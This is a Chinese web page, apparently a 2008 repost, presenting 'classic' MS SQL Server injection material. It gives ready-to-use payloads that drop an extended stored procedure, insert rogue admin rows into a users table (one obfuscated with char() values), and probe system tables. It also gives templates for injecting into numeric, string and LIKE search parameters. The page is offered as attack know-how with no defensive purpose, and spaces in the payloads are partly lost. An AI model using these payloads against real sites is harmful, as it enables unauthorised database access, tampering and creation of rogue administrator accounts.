非常经典的Ms Sql注射资料
2008-10-04 11:10:32 来源:WEB开发网execxp_webserver
一旦这个扩展存储执行过,可以这样删除它:
sp_dropextendedproc'xp_webserver'
insertintousersvalues(666,char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),0xffff)-
insertintousersvalues(667,123,123,0xffff)-
insertintousersvalues(123,'admin''--','password',0xffff)-
;anduser>0
;;and(selectcount(*)fromsysobjects)>0
;;and(selectcount(*)frommysysobjects)>0//为access数据库
-----------------------------------------------------------通常注射的一些介绍:
A)ID=49这类注入的参数是数字型,SQL语句原貌大致如下:
select*from表名where字段=49
注入的参数为ID=49And[查询条件],即是生成语句:
select*from表名where字段=49And[查询条件]
(B)Class=连续剧这类注入的参数是字符型,SQL语句原貌大致概如下:
select*from表名where字段='连续剧'
注入的参数为Class=连续剧'and[查询条件]and''=',即是生成语句:
select*from表名where字段='连续剧'and[查询条件]and''=''
(C)搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
select*from表名where字段like'%关键字%'
注入的参数为keyword='and[查询条件]and'%25'=',即是生成语句:
select*from表名where字段like'%'and[查询条件]and'%'='%'
中查找“非常经典的Ms Sql注射资料”更多相关内容
中查找“非常经典的Ms Sql注射资料”更多相关内容更多精彩
赞助商链接
